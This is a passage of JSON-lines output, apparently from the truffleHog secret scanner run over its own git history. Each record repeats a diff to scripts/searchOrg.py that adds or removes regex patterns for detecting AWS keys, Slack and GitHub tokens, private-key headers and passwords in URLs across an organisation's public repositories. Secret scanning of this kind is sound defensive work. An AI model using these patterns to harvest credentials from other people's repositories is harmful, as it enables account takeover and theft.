\"[a|A][p|P][i|I][_]?[k|K][e|E][y|Y].{0,30}['\\\"\\\\s][0-9a-zA-Z]{32,45}['\\\"\\\\s]\",\n+ \"Slack Webhook\": \"https://hooks.slack.com/services/T[a-zA-Z0-9_]{8}/B[a-zA-Z0-9_]{8}/[a-zA-Z0-9_]{24}\",\n+ \"Google (GCP) Service-account\": \"\\\"type\\\": \\\"service_account\\\"\",\n+ \"Twilio API Key\": \"SK[a-z0-9]{32}\",\n+ \"Password in URL\": \"[a-zA-Z]{3,10}://[^/\\\\s:@]{3,20}:[^/\\\\s:@]{3,20}@.{1,100}[\\\"'\\\\s]\",\n+}\n+\n+for key in rules:\n+ rules[key] = re.compile(rules[key])\n \n def get_org_repos(orgname, page):\n response = requests.get(url='https://api.github.com/users/' + orgname + '/repos?page={}'.format(page))\n@@ -11,8 +37,16 @@ def get_org_repos(orgname, page):\n if not json:\n return None\n for item in json:\n- if item['private'] == False:\n+\n+ if item['fork'] == False and reached:\n print('searching ' + item[\"html_url\"])\n- truffleHog.find_strings(item[\"html_url\"], do_regex=True, do_entropy=False, max_depth=100000)\n+ results = truffleHog.find_strings(item[\"html_url\"], do_regex=True, custom_regexes=rules, do_entropy=False, max_depth=100000)\n+ for issue in results[\"foundIssues\"]:\n+ d = loads(open(issue).read())\n+ d['github_url'] = \"{}/blob/{}/{}\".format(item[\"html_url\"], d['commitHash'], d['path'])\n+ d['github_commit_url'] = \"{}/commit/{}\".format(item[\"html_url\"], d['commitHash'])\n+ d['diff'] = d['diff'][0:200]\n+ d['printDiff'] = d['printDiff'][0:200]\n+ print(dumps(d, indent=4))\n get_org_repos(orgname, page + 1)\n-get_org_repos(\"twitter\", 1)\n+get_org_repos(\"square\", 1)\n", "path": "scripts/searchOrg.py", "printDiff": "\u001b[93m-----BEGIN DSA PRIVATE KEY-----\u001b[0m", "reason": "SSH (DSA) private key", "stringsFound": ["-----BEGIN DSA PRIVATE KEY-----"]} +{"branch": "origin/dev", "commit": "Merge pull request #135 from max-sixty/patch-1\n\nBenifit -> Benefit", "commitHash": "a4c69fa2f6b256bfe824ac82b96c77eb8c06b2d0", "date": "2018-12-17 07:21:16", "diff": "@@ -4,6 +4,32 @@ via https://github.com/dxa4481/truffleHog/pull/9\n \"\"\"\n import requests\n from truffleHog import truffleHog\n+import re\n+from json import loads, dumps\n+\n+rules = {\n+ \"Slack Token\": \"(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})\",\n+ \"RSA private key\": \"-----BEGIN RSA PRIVATE KEY-----\",\n+ \"SSH (OPENSSH) private key\": \"-----BEGIN OPENSSH PRIVATE KEY-----\",\n+ \"SSH (DSA) private key\": \"-----BEGIN DSA PRIVATE KEY-----\",\n+ \"SSH (EC) private key\": \"-----BEGIN EC PRIVATE KEY-----\",\n+ \"PGP private key block\": \"-----BEGIN PGP PRIVATE KEY BLOCK-----\",\n+ \"Facebook Oauth\": \"[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].{0,30}['\\\"\\\\s][0-9a-f]{32}['\\\"\\\\s]\",\n+ \"Twitter Oauth\": \"[t|T][w|W][i|I][t|T][t|T][e|E][r|R].{0,30}['\\\"\\\\s][0-9a-zA-Z]{35,44}['\\\"\\\\s]\",\n+ \"GitHub\": \"[g|G][i|I][t|T][h|H][u|U][b|B].{0,30}['\\\"\\\\s][0-9a-zA-Z]{35,40}['\\\"\\\\s]\",\n+ \"Google Oauth\": \"(\\\"client_secret\\\":\\\"[a-zA-Z0-9-_]{24}\\\")\",\n+ \"AWS API Key\": \"AKIA[0-9A-Z]{16}\",\n+ \"Heroku API Key\": \"[h|H][e|E][r|R][o|O][k|K][u|U].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}\",\n+ \"Generic Secret\": \"[s|S][e|E][c|C][r|R][e|E][t|T].{0,30}['\\\"\\\\s][0-9a-zA-Z]{32,45}['\\\"\\\\s]\",\n+ \"Generic API Key\": \"[a|A][p|P][i|I][_]?[k|K][e|E][y|Y].{0,30}['\\\"\\\\s][0-9a-zA-Z]{32,45}['\\\"\\\\s]\",\n+ \"Slack Webhook\": \"https://hooks.slack.com/services/T[a-zA-Z0-9_]{8}/B[a-zA-Z0-9_]{8}/[a-zA-Z0-9_]{24}\",\n+ \"Google (GCP) Service-account\": \"\\\"type\\\": \\\"service_account\\\"\",\n+ \"Twilio API Key\": \"SK[a-z0-9]{32}\",\n+ \"Password in URL\": \"[a-zA-Z]{3,10}://[^/\\\\s:@]{3,20}:[^/\\\\s:@]{3,20}@.{1,100}[\\\"'\\\\s]\",\n+}\n+\n+for key in rules:\n+ rules[key] = re.compile(rules[key])\n \n def get_org_repos(orgname, page):\n response = requests.get(url='https://api.github.com/users/' + orgname + '/repos?page={}'.format(page))\n@@ -11,8 +37,16 @@ def get_org_repos(orgname, page):\n if not json:\n return None\n for item in json:\n- if item['private'] == False:\n+\n+ if item['fork'] == False and reached:\n print('searching ' + item[\"html_url\"])\n- truffleHog.find_strings(item[\"html_url\"], do_regex=True, do_entropy=False, max_depth=100000)\n+ results = truffleHog.find_strings(item[\"html_url\"], do_regex=True, custom_regexes=rules, do_entropy=False, max_depth=100000)\n+ for issue in results[\"foundIssues\"]:\n+ d = loads(open(issue).read())\n+ d['github_url'] = \"{}/blob/{}/{}\".format(item[\"html_url\"], d['commitHash'], d['path'])\n+ d['github_commit_url'] = \"{}/commit/{}\".format(item[\"html_url\"], d['commitHash'])\n+ d['diff'] = d['diff'][0:200]\n+ d['printDiff'] = d['printDiff'][0:200]\n+ print(dumps(d, indent=4))\n get_org_repos(orgname, page + 1)\n-get_org_repos(\"twitter\", 1)\n+get_org_repos(\"square\", 1)\n", "path": "scripts/searchOrg.py", "printDiff": "\u001b[93m-----BEGIN EC PRIVATE KEY-----\u001b[0m", "reason": "SSH (EC) private key", "stringsFound": ["-----BEGIN EC PRIVATE KEY-----"]} +{"branch": "origin/dev", "commit": "Merge pull request #135 from max-sixty/patch-1\n\nBenifit -> Benefit", "commitHash": "a4c69fa2f6b256bfe824ac82b96c77eb8c06b2d0", "date": "2018-12-17 07:21:16", "diff": "@@ -4,6 +4,32 @@ via https://github.com/dxa4481/truffleHog/pull/9\n \"\"\"\n import requests\n from truffleHog import truffleHog\n+import re\n+from json import loads, dumps\n+\n+rules = {\n+ \"Slack Token\": \"(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})\",\n+ \"RSA private key\": \"-----BEGIN RSA PRIVATE KEY-----\",\n+ \"SSH (OPENSSH) private key\": \"-----BEGIN OPENSSH PRIVATE KEY-----\",\n+ \"SSH (DSA) private key\": \"-----BEGIN DSA PRIVATE KEY-----\",\n+ \"SSH (EC) private key\": \"-----BEGIN EC PRIVATE KEY-----\",\n+ \"PGP private key block\": \"-----BEGIN PGP PRIVATE KEY BLOCK-----\",\n+ \"Facebook Oauth\": \"[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].{0,30}['\\\"\\\\s][0-9a-f]{32}['\\\"\\\\s]\",\n+ \"Twitter Oauth\": \"[t|T][w|W][i|I][t|T][t|T][e|E][r|R].{0,30}['\\\"\\\\s][0-9a-zA-Z]{35,44}['\\\"\\\\s]\",\n+ \"GitHub\": \"[g|G][i|I][t|T][h|H][u|U][b|B].{0,30}['\\\"\\\\s][0-9a-zA-Z]{35,40}['\\\"\\\\s]\",\n+ \"Google Oauth\": \"(\\\"client_secret\\\":\\\"[a-zA-Z0-9-_]{24}\\\")\",\n+ \"AWS API Key\": \"AKIA[0-9A-Z]{16}\",\n+ \"Heroku API Key\": \"[h|H][e|E][r|R][o|O][k|K][u|U].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}\",\n+ \"Generic Secret\": \"[s|S][e|E][c|C][r|R][e|E][t|T].{0,30}['\\\"\\\\s][0-9a-zA-Z]{32,45}['\\\"\\\\s]\",\n+ \"Generic API Key\": \"[a|A][p|P][i|I][_]?[k|K][e|E][y|Y].{0,30}['\\\"\\\\s][0-9a-zA-Z]{32,45}['\\\"\\\\s]\",\n+ \"Slack Webhook\": \"https://hooks.slack.com/services/T[a-zA-Z0-9_]{8}/B[a-zA-Z0-9_]{8}/[a-zA-Z0-9_]{24}\",\n+ \"Google (GCP) Service-account\": \"\\\"type\\\": \\\"service_account\\\"\",\n+ \"Twilio API Key\": \"SK[a-z0-9]{32}\",\n+ \"Password in URL\": \"[a-zA-Z]{3,10}://[^/\\\\s:@]{3,20}:[^/\\\\s:@]{3,20}@.{1,100}[\\\"'\\\\s]\",\n+}\n+\n+for key in rules:\n+ rules[key] = re.compile(rules[key])\n \n def get_org_repos(orgname, page):\n response = requests.get(url='https://api.github.com/users/' + orgname + '/repos?page={}'.format(page))\n@@ -11,8 +37,16 @@ def get_org_repos(orgname, page):\n if not json:\n return None\n for item in json:\n- if item['private'] == False:\n+\n+ if item['fork'] == False and reached:\n print('searching ' + item[\"html_url\"])\n- truffleHog.find_strings(item[\"html_url\"], do_regex=True, do_entropy=False, max_depth=100000)\n+ results = truffleHog.find_strings(item[\"html_url\"], do_regex=True, custom_regexes=rules, do_entropy=False, max_depth=100000)\n+ for issue in results[\"foundIssues\"]:\n+ d = loads(open(issue).read())\n+ d['github_url'] = \"{}/blob/{}/{}\".format(item[\"html_url\"], d['commitHash'], d['path'])\n+ d['github_commit_url'] = \"{}/commit/{}\".format(item[\"html_url\"], d['commitHash'])\n+ d['diff'] = d['diff'][0:200]\n+ d['printDiff'] = d['printDiff'][0:200]\n+ print(dumps(d, indent=4))\n get_org_repos(orgname, page + 1)\n-get_org_repos(\"twitter\", 1)\n+get_org_repos(\"square\", 1)\n", "path": "scripts/searchOrg.py", "printDiff": "\u001b[93m-----BEGIN PGP PRIVATE KEY BLOCK-----\u001b[0m", "reason": "PGP private key block", "stringsFound": ["-----BEGIN PGP PRIVATE KEY BLOCK-----"]} +{"branch": "origin/dev", "commit": "bumping requirements\n", "commitHash": "355502852332d5efe3d9ec94682c77c662da8609", "date": "2018-12-17 07:17:41", "diff": "@@ -4,32 +4,6 @@ via https://github.com/dxa4481/truffleHog/pull/9\n \"\"\"\n import requests\n from truffleHog import truffleHog\n-import re\n-from json import loads, dumps\n-\n-rules = {\n- \"Slack Token\": \"(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})\",\n- \"RSA private key\": \"-----BEGIN RSA PRIVATE KEY-----\",\n- \"SSH (OPENSSH) private key\": \"-----BEGIN OPENSSH PRIVATE KEY-----\",\n- \"SSH (DSA) private key\": \"-----BEGIN DSA PRIVATE KEY-----\",\n- \"SSH (EC) private key\": \"-----BEGIN EC PRIVATE KEY-----\",\n- \"PGP private key block\": \"-----BEGIN PGP PRIVATE KEY BLOCK-----\",\n- \"Facebook Oauth\": \"[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].{0,30}['\\\"\\\\s][0-9a-f]{32}['\\\"\\\\s]\",\n- \"Twitter Oauth\": \"[t|T][w|W][i|I][t|T][t|T][e|E][r|R].{0,30}['\\\"\\\\s][0-9a-zA-Z]{35,44}['\\\"\\\\s]\",\n- \"GitHub\": \"[g|G][i|I][t|T][h|H][u|U][b|B].{0,30}['\\\"\\\\s][0-9a-zA-Z]{35,40}['\\\"\\\\s]\",\n- \"Google Oauth\": \"(\\\"client_secret\\\":\\\"[a-zA-Z0-9-_]{24}\\\")\",\n- \"AWS API Key\": \"AKIA[0-9A-Z]{16}\",\n- \"Heroku API Key\": \"[h|H][e|E][r|R][o|O][k|K][u|U].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}\",\n- \"Generic Secret\": \"[s|S][e|E][c|C][r|R][e|E][t|T].{0,30}['\\\"\\\\s][0-9a-zA-Z]{32,45}['\\\"\\\\s]\",\n- \"Generic API Key\": \"[a|A][p|P][i|I][_]?[k|K][e|E][y|Y].{0,30}['\\\"\\\\s][0-9a-zA-Z]{32,45}['\\\"\\\\s]\",\n- \"Slack Webhook\": \"https://hooks.slack.com/services/T[a-zA-Z0-9_]{8}/B[a-zA-Z0-9_]{8}/[a-zA-Z0-9_]{24}\",\n- \"Google (GCP) Service-account\": \"\\\"type\\\": \\\"service_account\\\"\",\n- \"Twilio API Key\": \"SK[a-z0-9]{32}\",\n- \"Password in URL\": \"[a-zA-Z]{3,10}://[^/\\\\s:@]{3,20}:[^/\\\\s:@]{3,20}@.{1,100}[\\\"'\\\\s]\",\n-}\n-\n-for key in rules:\n- rules[key] = re.compile(rules[key])\n \n def get_org_repos(orgname, page):\n response = requests.get(url='https://api.github.com/users/' + orgname + '/repos?page={}'.format(page))\n@@ -37,16 +11,8 @@ def get_org_repos(orgname, page):\n if not json:\n return None\n for item in json:\n-\n- if item['fork'] == False and reached:\n+ if item['private'] == False:\n print('searching ' + item[\"html_url\"])\n- results = truffleHog.find_strings(item[\"html_url\"], do_regex=True, custom_regexes=rules, do_entropy=False, max_depth=100000)\n- for issue in results[\"foundIssues\"]:\n- d = loads(open(issue).read())\n- d['github_url'] = \"{}/blob/{}/{}\".format(item[\"html_url\"], d['commitHash'], d['path'])\n- d['github_commit_url'] = \"{}/commit/{}\".format(item[\"html_url\"], d['commitHash'])\n- d['diff'] = d['diff'][0:200]\n- d['printDiff'] = d['printDiff'][0:200]\n- print(dumps(d, indent=4))\n+ truffleHog.find_strings(item[\"html_url\"], do_regex=True, do_entropy=False, max_depth=100000)\n get_org_repos(orgname, page + 1)\n-get_org_repos(\"square\", 1)\n+get_org_repos(\"twitter\", 1)\n", "path": "scripts/searchOrg.py", "printDiff": "\u001b[93m-----BEGIN RSA PRIVATE KEY-----\u001b[0m", "reason": "RSA private key", "stringsFound": ["-----BEGIN RSA PRIVATE KEY-----"]} +{"branch": "origin/dev", "commit": "bumping requirements\n", "commitHash": "355502852332d5efe3d9ec94682c77c662da8609", "date": "2018-12-17 07:17:41", "diff": "@@ -4,32 +4,6 @@ via https://github.com/dxa4481/truffleHog/pull/9\n \"\"\"\n import requests\n from truffleHog import truffleHog\n-import re\n-from json import loads, dumps\n-\n-rules = {\n- \"Slack Token\": \"(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})\",\n- \"RSA private key\": \"-----BEGIN RSA PRIVATE KEY-----\",\n- \"SSH (OPENSSH) private key\": \"-----BEGIN OPENSSH PRIVATE KEY-----\",\n- \"SSH (DSA) private key\": \"-----BEGIN DSA PRIVATE KEY-----\",\n- \"SSH (EC) private key\": \"-----BEGIN EC PRIVATE KEY-----\",\n- \"PGP private key block\": \"-----BEGIN PGP PRIVATE KEY BLOCK-----\",\n- \"Facebook Oauth\": \"[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].{0,30}['\\\"\\\\s][0-9a-f]{32}['\\\"\\\\s]\",\n- \"Twitter Oauth\": \"[t|T][w|W][i|I][t|T][t|T][e|E][r|R].{0,30}['\\\"\\\\s][0-9a-zA-Z]{35,44}['\\\"\\\\s]\",\n- \"GitHub\": \"[g|G][i|I][t|T][h|H][u|U][b|B].{0,30}['\\\"\\\\s][0-9a-zA-Z]{35,40}['\\\"\\\\s]\",\n- \"Google Oauth\": \"(\\\"client_secret\\\":\\\"[a-zA-Z0-9-_]{24}\\\")\",\n- \"AWS API Key\": \"AKIA[0-9A-Z]{16}\",\n- \"Heroku API Key\": \"[h|H][e|E][r|R][o|O][k|K][u|U].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}\",\n- \"Generic Secret\": \"[s|S][e|E][c|C][r|R][e|E][t|T].{0,30}['\\\"\\\\s][0-9a-zA-Z]{32,45}['\\\"\\\\s]\",\n- \"Generic API Key\": \"[a|A][p|P][i|I][_]?[k|K][e|E][y|Y].{0,30}['\\\"\\\\s][0-9a-zA-Z]{32,45}['\\\"\\\\s]\",\n- \"Slack Webhook\": \"https://hooks.slack.com/services/T[a-zA-Z0-9_]{8}/B[a-zA-Z0-9_]{8}/[a-zA-Z0-9_]{24}\",\n- \"Google (GCP) Service-account\": \"\\\"type\\\": \\\"service_account\\\"\",\n- \"Twilio API Key\": \"SK[a-z0-9]{32}\",\n- \"Password in URL\": \"[a-zA-Z]{3,10}://[^/\\\\s:@]{3,20}:[^/\\\\s:@]{3,20}@.{1,100}[\\\"'\\\\s]\",\n-}\n-\n-for key in rules:\n- rules[key] = re.compile(rules[key])\n \n def get_org_repos(orgname, page):\n response = requests.get(url='https://api.github.com/users/' + orgname + '/repos?page={}'.format(page))\n@@ -37,16 +11,8 @@ def get_org_repos(orgname, page):\n if not json:\n return None\n for item in json:\n-\n- if item['fork'] == False and reached:\n+ if item['private'] == False:\n print('searching ' + item[\"html_url\"])\n- results = truffleHog.find_strings(item[\"html_url\"], do_regex=True, custom_regexes=rules, do_entropy=False, max_depth=100000)\n- for issue in results[\"foundIssues\"]:\n- d = loads(open(issue).read())\n- d['github_url'] = \"{}/blob/{}/{}\".format(item[\"html_url\"], d['commitHash'], d['path'])\n- d['github_commit_url'] = \"{}/commit/{}\".format(item[\"html_url\"], d['commitHash'])\n- d['diff'] = d['diff'][0:200]\n- d['printDiff'] = d['printDiff'][0:200]\n- print(dumps(d, indent=4))\n+ truffleHog.find_strings(item[\"html_url\"], do_regex=True, do_entropy=False, max_depth=100000)\n get_org_repos(orgname, page + 1)\n-get_org_repos(\"square\", 1)\n+get_org_repos(\"twitter\", 1)\n", "path": "scripts/searchOrg.py", "printDiff": "\u001b[93m-----BEGIN OPENSSH PRIVATE KEY-----\u001b[0m", "reason": "SSH (OPENSSH) private key", "stringsFound": ["-----BEGIN OPENSSH PRIVATE KEY-----"]} +{"branch": "origin/dev", "commit": "bumping requirements\n", "commitHash": "355502852332d5efe3d9ec94682c77c662da8609", "date": "2018-12-17 07:17:41", "diff": "@@ -4,32 +4,6 @@ via https://github.com/dxa4481/truffleHog/pull/9\n \"\"\"\n import requests\n from truffleHog import truffleHog\n-import re\n-from json import loads, dumps\n-\n-rules = {\n- \"Slack Token\": \"(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})\",\n- \"RSA private key\": \"-----BEGIN RSA PRIVATE KEY-----\",\n- \"SSH (OPENSSH) private key\": \"-----BEGIN OPENSSH PRIVATE KEY-----\",\n- \"SSH (DSA) private key\": \"-----BEGIN DSA PRIVATE KEY-----\",\n- \"SSH (EC) private key\": \"-----BEGIN EC PRIVATE KEY-----\",\n- \"PGP private key block\": \"-----BEGIN PGP PRIVATE KEY BLOCK-----\",\n- \"Facebook Oauth\": \"[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].{0,30}['\\\"\\\\s][0-9a-f]{32}['\\\"\\\\s]\",\n- \"Twitter Oauth\": \"[t|T][w|W][i|I][t|T][t|T][e|E][r|R].{0,30}['\\\"\\\\s][0-9a-zA-Z]{35,44}['\\\"\\\\s]\",\n- \"GitHub\": \"[g|G][i|I][t|T][h|H][u|U][b|B].{0,30}['\\\"\\\\s][0-9a-zA-Z]{35,40}['\\\"\\\\s]\",\n- \"Google Oauth\": \"(\\\"client_secret\\\":\\\"[a-zA-Z0-9-_]{24}\\\")\",\n- \"AWS API Key\": \"AKIA[0-9A-Z]{16}\",\n- \"Heroku API Key\": \"[h|H][e|E][r|R][o|O][k|K][u|U].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}\",\n- \"Generic Secret\": \"[s|S][e|E][c|C][r|R][e|E][t|T].{0,30}['\\\"\\\\s][0-9a-zA-Z]{32,45}['\\\"\\\\s]\",\n- \"Generic API Key\": \"[a|A][p|P][i|I][_]?[k|K][e|E][y|Y].{0,30}['\\\"\\\\s][0-9a-zA-Z]{32,45}['\\\"\\\\s]\",\n- \"Slack Webhook\": \"https://hooks.slack.com/services/T[a-zA-Z0-9_]{8}/B[a-zA-Z0-9_]{8}/[a-zA-Z0-9_]{24}\",\n- \"Google (GCP) Service-account\": \"\\\"type\\\": \\\"service_account\\\"\",\n- \"Twilio API Key\": \"SK[a-z0-9]{32}\",\n- \"Password in URL\": \"[a-zA-Z]{3,10}://[^/\\\\s:@]{3,20}:[^/\\\\s:@]{3,20}@.{1,100}[\\\"'\\\\s]\",\n-}\n-\n-for key in rules:\n- rules[key] = re.compile(rules[key])\n \n def get_org_repos(orgname, page):\n response = requests.get(url='https://api.github.com/users/' + orgname + '/repos?page={}'.format(page))\n@@ -37,16 +11,8 @@ def get_org_repos(orgname, page):\n if not json:\n return None\n for item in json:\n-\n- if item['fork'] == False and reached:\n+ if item['private'] == False:\n print('searching ' + item[\"html_url\"])\n- results = truffleHog.find_strings(item[\"html_url\"], do_regex=True, custom_regexes=rules, do_entropy=False, max_depth=100000)\n- for issue in results[\"foundIssues\"]:\n- d = loads(open(issue).read())\n- d['github_url'] = \"{}/blob/{}/{}\".format(item[\"html_url\"], d['commitHash'], d['path'])\n- d['github_commit_url'] = \"{}/commit/{}\".format(item[\"html_url\"], d['commitHash'])\n- d['diff'] = d['diff'][0:200]\n- d['printDiff'] = d['printDiff'][0:200]\n- print(dumps(d, indent=4))\n+ truffleHog.find_strings(item[\"html_url\"], do_regex=True, do_entropy=False, max_depth=100000)\n get_org_repos(orgname, page + 1)\n-get_org_repos(\"square\", 1)\n+get_org_repos(\"twitter\", 1)\n", "path": "scripts/searchOrg.py", "printDiff": "\u001b[93m-----BEGIN DSA PRIVATE KEY-----\u001b[0m", "reason": "SSH (DSA) private key", "stringsFound": ["-----BEGIN DSA PRIVATE KEY-----"]} +{"branch": "origin/dev", "commit": "bumping requirements\n", "commitHash": "355502852332d5efe3d9ec94682c77c662da8609", "date": "2018-12-17 07:17:41", "diff": "@@ -4,32 +4,6 @@ via https://github.com/dxa4481/truffleHog/pull/9\n \"\"\"\n import requests\n from truffleHog import truffleHog\n-import re\n-from json import loads, dumps\n-\n-rules = {\n- \"Slack Token\": \"(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})\",\n- \"RSA private key\": \"-----BEGIN RSA PRIVATE KEY-----\",\n- \"SSH (OPENSSH) private key\": \"-----BEGIN OPENSSH PRIVATE KEY-----\",\n- \"SSH (DSA) private key\": \"-----BEGIN DSA PRIVATE KEY-----\",\n- \"SSH (EC) private key\": \"-----BEGIN EC PRIVATE KEY-----\",\n- \"PGP private key block\": \"-----BEGIN PGP PRIVATE KEY BLOCK-----\",\n- \"Facebook Oauth\": \"[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].{0,30}['\\\"\\\\s][0-9a-f]{32}['\\\"\\\\s]\",\n- \"Twitter Oauth\": \"[t|T][w|W][i|I][t|T][t|T][e|E][r|R].{0,30}['\\\"\\\\s][0-9a-zA-Z]{35,44}['\\\"\\\\s]\",\n- \"GitHub\": \"[g|G][i|I][t|T][h|H][u|U][b|B].{0,30}['\\\"\\\\s][0-9a-zA-Z]{35,40}['\\\"\\\\s]\",\n- \"Google Oauth\": \"(\\\"client_secret\\\":\\\"[a-zA-Z0-9-_]{24}\\\")\",\n- \"AWS API Key\": \"AKIA[0-9A-Z]{16}\",\n- \"Heroku API Key\": \"[h|H][e|E][r|R][o|O][k|K][u|U].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}\",\n- \"Generic Secret\": \"[s|S][e|E][c|C][r|R][e|E][t|T].{0,30}['\\\"\\\\s][0-9a-zA-Z]{32,45}['\\\"\\\\s]\",\n- \"Generic API Key\": \"[a|A][p|P][i|I][_]?[k|K][e|E][y|Y].{0,30}['\\\"\\\\s][0-9a-zA-Z]{32,45}['\\\"\\\\s]\",\n- \"Slack Webhook\": \"https://hooks.slack.com/services/T[a-zA-Z0-9_]{8}/B[a-zA-Z0-9_]{8}/[a-zA-Z0-9_]{24}\",\n- \"Google (GCP) Service-account\": \"\\\"type\\\": \\\"service_account\\\"\",\n- \"Twilio API Key\": \"SK[a-z0-9]{32}\",\n- \"Password in URL\": \"[a-zA-Z]{3,10}://[^/\\\\s:@]{3,20}:[^/\\\\s:@]{3,20}@.{1,100}[\\\"'\\\\s]\",\n-}\n-\n-for key in rules:\n- rules[key] = re.compile(rules[key])\n \n def get_org_repos(orgname, page):\n response = requests.get(url='https://api.github.com/users/' + orgname + '/repos?page={}'.format(page))\n@@ -37,16 +11,8 @@ def get_org_repos(orgname, page):\n if not json:\n return None\n for item in json:\n-\n- if item['fork'] == False and reached:\n+ if item['private'] == False:\n print('searching ' + item[\"html_url\"])\n- results = truffleHog.find_strings(item[\"html_url\"], do_regex=True, custom_regexes=rules, do_entropy=False, max_depth=100000)\n- for issue in results[\"foundIssues\"]:\n- d = loads(open(issue).read())\n- d['github_url'] = \"{}/blob/{}/{}\".format(item[\"html_url\"], d['commitHash'], d['path'])\n- d['github_commit_url'] = \"{}/commit/{}\".format(item[\"html_url\"], d['commitHash'])\n- d['diff'] = d['diff'][0:200]\n- d['printDiff'] = d['printDiff'][0:200]\n- print(dumps(d, indent=4))\n+ truffleHog.find_strings(item[\"html_url\"], do_regex=True, do_entropy=False, max_depth=100000)\n get_org_repos(orgname, page + 1)\n-get_org_repos(\"square\", 1)\n+get_org_repos(\"twitter\", 1)\n", "path": "scripts/searchOrg.py", "printDiff": "\u001b[93m-----BEGIN EC PRIVATE KEY-----\u001b[0m", "reason": "SSH (EC) private key", "stringsFound": ["-----BEGIN EC PRIVATE KEY-----"]} +{"branch": "origin/dev", "commit": "bumping requirements\n", "commitHash": "355502852332d5efe3d9ec94682c77c662da8609", "date": "2018-12-17 07:17:41", "diff": "@@ -4,32 +4,6 @@ via https://github.com/dxa4481/truffleHog/pull/9\n \"\"\"\n import requests\n from truffleHog import truffleHog\n-import re\n-from json import loads, dumps\n-\n-rules = {\n- \"Slack Token\": \"(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})\",\n- \"RSA private key\": \"-----BEGIN RSA PRIVATE KEY-----\",\n- \"SSH (OPENSSH) private key\": \"-----BEGIN OPENSSH PRIVATE KEY-----\",\n- \"SSH (DSA) private key\": \"-----BEGIN DSA PRIVATE KEY-----\",\n- \"SSH (EC) private key\": \"-----BEGIN EC PRIVATE KEY-----\",\n- \"PGP private key block\": \"-----BEGIN PGP PRIVATE KEY BLOCK-----\",\n- \"Facebook Oauth\": \"[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].{0,30}['\\\"\\\\s][0-9a-f]{32}['\\\"\\\\s]\",\n- \"Twitter Oauth\": \"[t|T][w|W][i|I][t|T][t|T][e|E][r|R].{0,30}['\\\"\\\\s][0-9a-zA-Z]{35,44}['\\\"\\\\s]\",\n- \"GitHub\": \"[g|G][i|I][t|T][h|H][u|U][b|B].{0,30}['\\\"\\\\s][0-9a-zA-Z]{35,40}['\\\"\\\\s]\",\n- \"Google Oauth\": \"(\\\"client_secret\\\":\\\"[a-zA-Z0-9-_]{24}\\\")\",\n- \"AWS API Key\": \"AKIA[0-9A-Z]{16}\",\n- \"Heroku API Key\": \"[h|H][e|E][r|R][o|O][k|K][u|U].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}\",\n- \"Generic Secret\": \"[s|S][e|E][c|C][r|R][e|E][t|T].{0,30}['\\\"\\\\s][0-9a-zA-Z]{32,45}['\\\"\\\\s]\",\n- \"Generic API Key\": \"[a|A][p|P][i|I][_]?[k|K][e|E][y|Y].{0,30}['\\\"\\\\s][0-9a-zA-Z]{32,45}['\\\"\\\\s]\",\n- \"Slack Webhook\": \"https://hooks.slack.com/services/T[a-zA-Z0-9_]{8}/B[a-zA-Z0-9_]{8}/[a-zA-Z0-9_]{24}\",\n- \"Google (GCP) Service-account\": \"\\\"type\\\": \\\"service_account\\\"\",\n- \"Twilio API Key\": \"SK[a-z0-9]{32}\",\n- \"Password in URL\": \"[a-zA-Z]{3,10}://[^/\\\\s:@]{3,20}:[^/\\\\s:@]{3,20}@.{1,100}[\\\"'\\\\s]\",\n-}\n-\n-for key in rules:\n- rules[key] = re.compile(rules[key])\n \n def get_org_repos(orgname, page):\n response = requests.get(url='https://api.github.com/users/' + orgname + '/repos?page={}'.format(page))\n@@ -37,16 +11,8 @@ def get_org_repos(orgname, page):\n if not json:\n return None\n for item in json:\n-\n- if item['fork'] == False and reached:\n+ if item['private'] == False:\n print('searching ' + item[\"html_url\"])\n- results = truffleHog.find_strings(item[\"html_url\"], do_regex=True, custom_regexes=rules, do_entropy=False, max_depth=100000)\n- for issue in results[\"foundIssues\"]:\n- d = loads(open(issue).read())\n- d['github_url'] = \"{}/blob/{}/{}\".format(item[\"html_url\"], d['commitHash'], d['path'])\n- d['github_commit_url'] = \"{}/commit/{}\".format(item[\"html_url\"], d['commitHash'])\n- d['diff'] = d['diff'][0:200]\n- d['printDiff'] = d['printDiff'][0:200]\n- print(dumps(d, indent=4))\n+ truffleHog.find_strings(item[\"html_url\"], do_regex=True, do_entropy=False, max_depth=100000)\n get_org_repos(orgname, page + 1)\n-get_org_repos(\"square\", 1)\n+get_org_repos(\"twitter\", 1)\n", "path": "scripts/searchOrg.py", "printDiff": "\u001b[93m-----BEGIN PGP PRIVATE KEY BLOCK-----\u001b[0m", "reason": "PGP private key block", "stringsFound": ["-----BEGIN PGP PRIVATE KEY BLOCK-----"]} +{"branch": 